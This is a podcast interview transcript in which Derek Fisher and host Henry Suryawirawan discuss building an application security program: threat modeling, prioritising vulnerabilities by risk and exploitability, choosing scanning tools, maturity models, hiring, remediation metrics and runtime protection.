Henry Suryawirawan: Thanks for explaining that. So now assuming that people understand security risk and you know why it is wise to actually implement some kind of security program. Where do people start? I think in your book you mentioned about this thing called threat modeling as the first step. So maybe if you can explain also what does it mean to do threat modeling and what does it entail?

Derek Fisher: Yeah, there’s a couple different ways of doing threat modeling. And I think that we do threat modeling on a daily basis whether we know it or not. We get in our car and we start driving and our mind is already doing, whether we consciously think about it or not, we’re doing threat modeling. You know, am I going the right direction? Is there gonna be traffic? Is this person gonna stop at this stop sign that I’m about to go through? And you build in certain mitigations and you determine like whether you’re doing the right thing.

On a basic level, threat modeling is essentially asking what can go wrong. There’s a lot of formal processes around threat modeling, including using tools to do threat models. But it ultimately comes down to asking that basic question, what can go wrong? And once you identify what that wrong is, you start developing those mitigations and remediation efforts. But if you want to get started with threat modeling, there’s a couple different tools that I usually recommend. One is the Microsoft Threat Model tool, which is free to download. OWASP also has called a Threat Dragon, which is also a threat model tool, purpose-built for designing threat models. Other individuals and organizations will use things like PowerPoint or Visio or something like that.

Just because, essentially, when you’re doing a threat model is that you’re drawing out the architecture of the system. And you wanna understand what the different touchpoints are in that system, whether they’re third party integrations, or whether they’re internal users or external users. You wanna know basically what that attack surface looks like for that system. And then start asking those questions on each one of those integration points. Ask the question, what can go wrong? Can somebody spoof this call? Can somebody tamper with the data that’s coming through? Can someone perform a denial of service? Can someone change their access level from a simple user to an admin user?

And you go through that with each one of those interactions with the system. And as you do that and identify like, oh yeah, well, somebody can perform a denial service. Well, is this high enough risk for us to integrate a highly available system? For us to be able to mitigate or remediate that denial of service attack. And so that’s the basic process of threat modeling is, designing that architecture, identifying the interaction points, and start asking those questions about what are the different attacks that could be performed, and then what are we gonna do about that?

Now there’s also a more, what we would call like a manual threat model process, which is essentially getting a bunch of individuals into a room with a whiteboard and doing the same thing, where you draw out the architecture, you start asking those questions. But the tools, using something like OWASP Threat Dragon or Microsoft Threat Model tool. Or there’s commercial off the shelf threat model tools as well that exist. But using any of those tools means that an individual or a very small group of individuals can work on that threat model. You can put into, maybe a central location where you can store those threat models, their digital format. So they’re easy to maintain and hand out. That’s the benefit of using a tool for threat modeling.

But when you look at doing a manual threat model on a whiteboard, it’s more time consuming. You can’t really take your whiteboard and check it into a repository somewhere. But you’re gonna tend to get better results in those manual type of threat model environments, cause you’re gonna get more collaborative responses from the people that are in that conversation. But it doesn’t scale as well. So, you know, there’s some trade offs, but, again, it all comes down to asking that question, what can go wrong and what are we gonna do about it?

[00:22:49] Threat Classification

Henry Suryawirawan: Thanks for explaining about threat modeling. So for people who haven’t done this before, how frequent should they do this kind of exercise? Is it like every time there’s a new thing in the architecture? Or is it like a periodic thing, like maybe every quarter, every month? Is there some kind of advice that you wanna give people when they should do threat modeling? And after we collect all these threat modeling findings, how should people collect and prioritize this and also explaining to the whole company or maybe the management that, okay, some of these are real risk that we should work on?

Derek Fisher: Yeah. It comes down to understanding what the risk level or risk tolerances of the organization. And that’s a very key component that I think we’re missing in many companies, is how do you really know what the risk is of the findings that you find in your software? And we don’t always do a good job of that. We know generally what our flagship products are. If you’re working inside of an organization, you know what your flagship products are, you know where your crown jewels are in terms of data, you know what the critical workflows are and you can determine like, okay, well this vulnerability that we found impacts this application, has potential to compromise this data that’s high risk, so we should tackle that.

However, again, we’re not great at being able to make that decision quickly and in a very calculated way. It tends to be more individuals making, I don’t wanna say gut reaction, but it sort of is. People saying, oh, this is our flagship product with a lot of sensitive data, therefore it’s gotta be high risk.

But risk really comes down to technical risk and business risk. There’s technical risk of are we gonna lose confidentiality, the integrity of the data, the availability of the system, and then from the business side, do we have compliance concerns? Do we have contractual concerns? Do we have dollar amounts that are assigned to downtime for this application? And marrying those two together really give you the overall risk of what that vulnerability might be in the context of that application. So I think we’re kind of missing that context in a lot of organizations in terms of how do we frame those into those vulnerabilities that we find? How do we frame them into the right context so that we know what we’re tackling? Because prioritization and really understanding how we prioritize the vulnerabilities that come in, need to be put through that lens of risk.

But the other side of that is, from a technical standpoint is what’s the exploitability of this vulnerability? And that’s another kind of piece that we’re not, as an industry, great at getting to. And we can find, application security teams can find vulnerabilities all day. Penetration testers can find vulnerabilities all day too. And we have no shortage of ability to be able to find vulnerabilities, and talk about like, hey, I found 10 new vulnerabilities today. Great! What are we gonna do about it? Are these really actual issues that we need to be concerned about? Are they gonna actually go into a production environment? If they go into that production environment, are they actually going to be exploited?

Because if in any mature organization you’re gonna have runtime protection, you’re gonna have segmentation, you’re gonna have all these other controls in place that may make that vulnerability unexploitable. So understanding how to prioritize vulnerabilities and understanding how to really contextualize them is not easy. It’s understanding what is the organization’s risk, what’s the exploitability of that vulnerability, and, you know, putting that together and making a decision quickly. When you do find those and you find one that, hey, this vulnerability here is in a very high risk application, it has potential to expose a lot of data, which is gonna put us at compliance risk. And yes, it is exploitable because we have no mitigations in front of it.

That should be a, I don’t wanna say slam dunk, but I think that’s a typically a slam dunk for organizations to say, hey, that’s the one we need to go after, not the other 50 that we found that are unexploitable. And I think for most organizations, getting to that point and being able to show like, hey, here’s a valid vulnerability that really is going to be impactful. That’s what they wanna chase. They don’t wanna chase the other 50 that are just not of a concern.

[00:27:04] Starting Application Security Program

Henry Suryawirawan: And you are right, also, like we can always find vulnerabilities, right? But what to do about it, because sometimes it could be in hundreds and thousands, depending on what tools you integrate. And speaking about tools, you earlier mentioned things like dynamic application security testing, static analysis, software composition analysis. What are the possible things that actually a company or organization can introduce within their security program apart from those that you have mentioned?

And where should people start, because we have so many, right? I don’t think any new company can easily just introduce all of them. But where should people prioritize? Maybe start as the easiest one first, or maybe the most impactful ones. Maybe you can give us some guidance here.

Derek Fisher: Securing the development life cycle can be done a hundred different ways. And there can be any combination of tools. And I know talking to some of my peers and looking at others in the industry, you can see where some are doing things that are completely different, and some are doing things that are very similar to what I’m doing at my company. And I think it really comes down to a few things.

One is, what’s the budget tolerance. You know, if you’re on a shoestring budget and you don’t have a lot of cash to just throw at a problem, then you have to be creative. If you are less constrained in that area, then you can have a little bit more leeway in being able to build a more robust security development program. But it does come down, at some point, finding more vulnerabilities isn’t making you more secure. And in fact, it may make you, you’re not gonna get invited to the Christmas party and stuff like that, because all you’re doing is finding more vulnerabilities and making everybody angry. So I think at some point, you have to get quality over quantity.

And you know with all that being said, I think it really does depend on the organization. What is the business budget tolerance? And what is your risk as an organization? If you’re a company that has no sensitive data, you are not processing credit cards, you’re not holding client data, there’s no sensitive information, you’re not gonna want to integrate all the security tools that Gartner puts out there and layer ‘em all into your development pipeline. You’re gonna be a little bit more measured in that sense. But if you’re a large organization with high risk data, high risk workflows, then yeah, you’re gonna have a little different context.

But the way I usually try to approach it is that, think about what are you trying to discover. And if you’re looking to discover vulnerabilities, the way to start with that is in those runtime type of tools, so DAST or IAST. The other thing is get a penetration test. If you’re going use a third party, that’s fine. If you have people in-house that can do it, that’s great. But you wanna find out what are our surface vulnerabilities that we need to be concerned about. Ones that would actually show up in an environment. And those tools, DAST and IAST and using a penetration testing engagement will help you get that information relatively quickly. But there’s the concerns around scope. Like, do we get everything in the application? Are there any hidden corners that didn’t get caught by the scans?

And then SCA, software composition analysis. To me, it should always be integrated. It’s very low friction, usually low cost. There are open source tools out there that can help you. You can build your own based on some open APIs for access to things like the NVD (National Vulnerability Database) to get just basically look at your libraries and understand which one of these libraries have known vulnerabilities in it that we need to replace. And that again, to me is just low hanging fruit. Set aside the code that we’re developing. The code that we’re pulling from repositories and third parties, are those vulnerable. And tools like SCA will certainly help with that. And so I think those, you know, getting the surface level vulnerabilities and getting the vulnerabilities that exist in the libraries that you’re using are core application security planks, I would say, in terms of building a program.

And then you start turning the screws there a little bit, looking at static analysis cause they tend to be noisy. And they tend to turn out a lot of vulnerabilities. But you can integrate them in the development environment. And if you have it properly tuned, if you’re using a good tool and if you have smart engineers and smart application security individuals, then you can get some value out of those and be able to try to head off things before they go into a production environment.

Additionally, start looking at your training program, your security training program, and making sure that engineers are getting the security training that will help them try to, again, reduce adding those vulnerabilities. And last thing I would say is a security champions program, which is really a sign of a mature application security program when you’re firing up a champions program. Because that’s usually where the tools are integrated, you’re getting the vulnerabilities, now you need additional help in trying to resolve those vulnerabilities. And that’s kind of where a champions team comes in.

Henry Suryawirawan: Yeah. Speaking about SCA, right? Software composition analysis. I think these days I just want to highlight like we all use many software that are open sourced or are free to download. And it’s not just in terms of libraries or frameworks, right? Sometimes also the container images, your VM images, and things like that. There are so many things that people have built. I’m not saying that open source is not secure. But there are always points where maybe some kind of hackers include some kind of malicious software inside those open source tools. And hence having this SCA is actually very important.

And I think I heard maybe last time that people quoted the software that you write in an organization, maybe even like more than a half of it is actually coming from these open source and third party libraries, right? So that is actually the potential risk that you are assuming if you use a lot of soft open source software tools. These are a lot of attack surface.

[00:32:45] Security Program Maturity Model

Henry Suryawirawan: And speaking about maturity, you mentioned just now. When we talk about maturity, it’s always coming to this maturity model. Is there something like maturity model for implementing security program within an organization?

Derek Fisher: Yeah, there are. BSIMM and SAMM are the two that probably come to mind for most people. And they’re two different ways of looking at a maturity model. And BSIMM – Building Security In Maturity Model is what BSIMM stands for – is looking at other organizations and doing basically an assessment of that organization and saying, well, here’s where this organization is from a maturity standpoint. And you, as your organization, can then look at that and say, well, where are we at? It’s essentially measuring yourself up against your peers and understanding, okay, what are the other organizations of my size in my industry? What is the one or two, three things that they, that everybody in this category is doing? Am I doing those things, right? And so that’s a good way of looking at, okay, are we doing the things that our peers are doing.

With OWASP SAMM, that’s more of a classic maturity model where, okay, here’s the level that you’re starting at and here are the things you need to do to get to level one. And then here’s the things you need to do to get to level two, and so forth. And the goal there is to really look at those steps in the maturity model and having targets for where you want to be.

You may not have to be at the highest level of maturity. Again, going back to understanding what your organization does. If you’re not processing credit cards, if you’re not holding a client sensitive data and you’re not a critical app, you don’t need to be at the highest level. Maybe level one, level two is just fine. But what that does is it allows you to look at if we want to get to level two, here are the things we need to do. You need to build out a roadmap that says, here are the steps we’re gonna take to get to that level, and here’s a timeline that we’re gonna go to be there.

Personally, I have the Derek Maturity Model, so it’s a little different. I think BSIMM is more valuable to me than SAMM. And the reason is that I wanna know what are the other organizations doing? Are we in line with that? But sometimes just having conversations with your peers is just as relevant. When I’ve had conversations with peers and just trying to see what they’re doing compared to what I’m doing, and we’ll kind of exchange notes. And you get that sense of like, hey, okay, we’re doing mostly well. But at the same time, we had the same challenges trying to figure out how we deal with the vulnerabilities that we detect and so forth. And just having conversations with your peers is just as helpful I think.

Henry Suryawirawan: I like the Derek’s Maturity Model. So yeah, just even speaking in conferences or in networking, or even within peers, right. I think you can also maybe find insights of what kind of security practices you should include.

[00:35:27] Building Security Teams

Henry Suryawirawan: And speaking about building this program, obviously, we need people, right. But like I mentioned in the beginning, sometimes the mindset is that we always assume security is somebody else’s problem. In this case, it’s like application security team. In your experience, how should people go about hiring this application security team and what’s the ratio size? And from my experience as well, hiring a good security engineers are really, really tough. And it’s not just they are highly in demand, but the supply is also not that many. So what would you go about building these security teams? How do we find good security engineers, and, yeah, how do we scale this within organization?

Derek Fisher: I think the first thing to realize is you’re never gonna scale to what you need. Don’t even bother. It’s not possible. I’ve had very large teams. I’ve had very small teams. My team right now, I would say is relatively large compared to what I’ve had in the past. And anybody that follows me or has heard me on other conversations, I’ll say it again. Like, I could double the size of my team and it probably still wouldn’t be sufficient. And a lot of it is because application security is very different than security operations centers, very different than network security, and so forth.

The way I always describe it is, application security teams are the sidecar to engineering. We are the ones that have to be part of that development process to ensure that security is integrated. Now that doesn’t mean it has to be an individual. And if it is an individual, it doesn’t have to be an application security individual, which is why things like champions programs or security education programs are very helpful in the sense that you’re helping to drive security education across the engineering organization.

But if you are tasked with building an application security team, it comes down to asking the question, what do we want to do? Do we want to just be a team of penetration testers? Do we want to just be a team of engineers that are working with the developers in engineering and helping them to create secure code? Do we just wanna integrate tools and not do anything other than create, integrate tools, find vulnerabilities, and tell somebody, go fix ‘em. So it really comes down to understanding what is your organization going to tolerate and what are the actual needs for the team?

So every organization’s gonna have a different kind of view on that. And it really comes down to understanding what is the budget tolerance. What is the need from an organization perspective? And what is the roadmap for the application security team? Is it again, just developing, integrating tools and finding vulnerabilities? Do we wanna get more proactive in terms of blue teaming and purple teaming and red teaming to determine, discover those vulnerabilities, or are we just gonna stick to architecture and design?

So there’s a lot of different ways of tackling that. But again, I go back to my first comment is that, being able to hire the “right size” in terms of individuals, you’re not gonna do it. And I don’t recall the numbers off the top of my head, but I know BSIMM had some numbers around what is the right size. But again, it varies. It could be for every engineer you have or for every a hundred engineers, you have one AppSec person. For every 50, you have one. It really depends on the organization.

But when it comes down to hiring, one of the things that I typically try to look for is somebody that has some type of development background. Because if you can’t speak the language with the development team, then you know you’re already at a disadvantage. Not that you can’t be in application security, cause obviously we have plenty of people that didn’t come out at development that are in application security. But it’s certainly helpful to have those individuals on your team to be able to really translate these vulnerabilities that come out of these tools and penetration testing and go back to the development team and say, “Looking at your code, here’s exactly what the problem is and here’s exactly how you can resolve it.”

I think that goes a long way, not just in making the organization more secure and making the application more secure, but also building that relationship between the development team and the application security team where we both understand each other, therefore we’re on somewhat common ground there. So I do typically look for people that have either come out of the development space or have some type of a development background.

Henry Suryawirawan: I would say that I agree with your opinion as well that we should hire a security engineer with some development background. What I find in the industry typically is there are so many security so-called experts, but they are mainly specialized in tools. Like I’m a specialist of these tools, I know how to implement these tools and use it, but not necessarily going back into the development life cycle and even advising developers, okay, you should not do this. Or even looking at the code, right? How things should be prevented in the first place.

So I think, yeah, having this kind of knowledge of development background will be, first of all, like you mentioned, right, build a good relationship. But obviously if we can prevent security issues in the earlier phase, again, coming back to the shift left, I think that makes a lot more impact.

[00:40:19] Measuring the Program’s Success

Henry Suryawirawan: So speaking about doing this security program, building some kind of roadmap, understanding what do we want out of this security team? And if we have established this security team, what could be a good indicator of success? What are the measurement of success? How should you evaluate? Is it just by number of findings or is it just number of security breaches incidents? Or is there any other measurement that you advise people to look at for measuring the success?

Derek Fisher: Yeah, I think there’s two main ones that I would focus on. One is the downward trend on vulnerabilities, not upward. Again, we have no problem finding vulnerabilities. We can find them all day, every day. But it’s really, are we moving the needle and reducing that backlog? That to me is a better indicator of a security program where we’re reducing that backlog, not adding to it. And to be honest, there’s been times where we’ve had scans done or tests done, and there weren’t any vulnerabilities that were found. And all of us that work in the security space are like, “Nah, I call BS on that. That’s, there’s no way.” And you kind of second guess yourself, where it’s like, “Wait, that, that can’t be right. You know, there’s gotta be something.”

And after seeing several of those, I’m starting to come around to the ideas like, well, hey, maybe the program’s working, you know. Maybe we’re actually stopping these things from going out and that’s a good thing. But like I said, all of us in the security space, immediately when you see a scan that comes back with no results are like, wait a minute, that can’t be right. But yeah, I think as long as you can validate that, no, this is right. I think that’s a good indication as well is that the program’s working right. We’re not finding things as much. We’re not adding to the backlog. We’re reducing it.

I think the other thing too is something I’ll steal from the operational spaces, you know, meantime to remediation, how quickly are we resolving those vulnerabilities? Do we have vulnerabilities that are sitting out there for weeks, months, maybe even years? If that’s the case, that’s a problem. And there’s a couple things with that, especially ones that are very long lasting vulnerabilities, past several months or even a year or more. You have to ask a question, is this even still a valid issue? Something that’s been out there that long that there’s something not right there.

But I think looking at the amount of time that it takes to actually remediate a vulnerability is also a critical indicator of how successful the program is. Because, again, we can find vulnerabilities all day. But if a critical vulnerability is found and we’re able to remediate that within a few hours or a day or two or something like that, that’s a very strong indicator that, your program is humming along the way it should.

[00:42:48] Zero Day Vulnerabilities

Henry Suryawirawan: Yeah. Speaking about remediation, I think the ultimate thing will be the zero day vulnerabilities, right, whenever it’s found. And how long does it take for the organization to actually take an action. Maybe in your opinion, you are in this security space a lot more, how should people build this kind of zero day capability?

Derek Fisher: Yeah. And I think that comes down to that meantime to remediation, right? I’ll go back to the SCA example, the software composition. We can develop software and we can have zero vulnerabilities when that software goes out into production. The next day, some component that we pulled in from a repository could be vulnerable, whether it’s a zero day or whether it’s an identified public vulnerability. Either way it’s vulnerable, right? And you did everything right. Time will result in vulnerabilities being found.

And so it really comes down to how your process is in place to take those vulnerabilities that have been discovered in a production environment and get a remediation out the door in a short period of time. That goes back to that meantime to remediation where if we find an issue in production and we’re able to get a remediation pushed to production in a very short period of time. That could be hours, that could be days, could be a week or so, then great. That means that your program is again, doing very well.

Something that we didn’t really touch on and it’s not because I was ignoring it, but runtime protection. There are tools out there, whether it’s WAF (Web Application Firewall) or Runtime Application Self-Protection. Those also go a long way in being able to provide some cover for a period of time until you can get that remediation out the door. So there’s a lot of levers that we can kind of pull from a security perspective to ensure that we are providing that protection against, especially things like zero days, where something like runtime protection does come into play. Because it allows you to do virtual patching and it allows you to potentially stop any malicious activity until you get code out the door.

Henry Suryawirawan: Thanks for the plug for the runtime, the WAF and all these things. So I think that sometimes can be very useful, especially if you are being attacked as well. DDoS for example, right, where suddenly somebody from the internet just target your system. So having this kind of runtime protection definitely is very useful. If you don’t have it, please implement that as soon as possible.

[00:44:59] 3 Tech Lead Wisdom

Henry Suryawirawan: So, Derek, it’s been a great conversation. Learning about security is very exciting as well. Unfortunately, we reach the end of our conversation. But I have one last question that I normally ask for all my guests, which I call the three technical leadership wisdom. So think of it just like an advice that you wanna give to the listeners here. Maybe if you can share us your version of three technical leadership wisdom.

Derek Fisher: Yeah. I think, one is stay curious. One thing with technology is that it’s always changing, right? And a prime example, everyone’s on the AI train right now where it’s everywhere, it’s inescapable and everyone’s trying to figure out what to do with it. And it’s just a prime example of how things change. And I think there’s a lot of people trying to figure out, is this a danger or is this gonna be helpful? I think there’s plus and minuses, there’s two sides to that. It’s just, again, it’s an example of where technology’s always changing. One of the things with application security in general or more specifically is that we have to stay up to speed with what development’s doing. You know, the things that we were doing five years ago are vastly different than what we’re doing today. And so you have to be able to stay curious, stay engaged, and be able to know where the technology is heading.

I think the other thing is be a mentor if you can, or be able to help others. Again, especially in this space with security. Henry, you mentioned earlier about how there’s a lot of openings in security and we’re having trouble filling them. And I think we need help in this space. We definitely need people that want to get into security. And I think being able to help mentor people and be able to bring them into this space is gonna help all of us. So find somebody that might be interested in security and try to help them along the way.

I guess the last point I would make is, I know we were kind of sorted on the same thing with in terms of hiring and staffing. But certifications aren’t always the answer. I know that I could probably sit down and probably take a certification test and pass it today without studying on many of these. That doesn’t mean that I’ve achieved anything, right? I’m not saying certifications are wrong or anything like that, because there’s definitely value in certifications. I know a lot of organizations look specifically for certifications to make a hiring decision.

But what I’ve often found is that I like studying for certifications, whether I take the exam or not, because I tend to learn from that. I think especially in this space, we see a lot of people that just want to get into security and the first question is, which certification should I take? And it’s like, well, you don’t necessarily have to get a certification in order to get in this space. I mean, you need to know something, right?

So start dabbling, start getting involved. When you’re looking at application security specifically, start understanding how software is developed. Start understanding about CI/CD pipelines and integrating tools and how code gets delivered and deployed and maintained. If you’re looking into getting into other aspects of security, you know, start understanding those different corners and really, really understand it. Not just understand it enough to pass an exam. So that’s my advice.

Henry Suryawirawan: Right. Thank you for including the certifications. Yeah. I think now that you mentioned it, I’m very aware that a lot of people in the security space wants to collect so-called certifications, right? There are so many security organizations and things like that. And people tend to chase these certifications. But like you mentioned, right, it’s always about the practicality. It’s not just the knowledge only, you can accumulate all this knowledge, but the practicality, I think is the most important, like how do you actually deal with security vulnerability or even prevent it the development lifecycle?

So Derek, if people enjoy this conversation, they would want to learn from you. Maybe the Derek’s maturity model, right? Is there a place where they can find you online,

Derek Fisher: Yeah, I try to stay pretty active on LinkedIn. Like I said, I stay pretty busy. But, I try to get on LinkedIn and post and things like that. And I’ve been creating some content that I’ve been releasing. Anybody that’s been following me on LinkedIn will see that. But yeah, the best way to get ahold of me is on LinkedIn.

Henry Suryawirawan: I’ve seen some of your YouTube videos, I think that’s really cool and fun. So yeah, maybe people should check those out as well.

So thank you again, Derek, for this opportunity. I really learned a lot from security, the conversation today, and I hope people do as well. So thank you for that.

Derek Fisher: Thank you.

– End –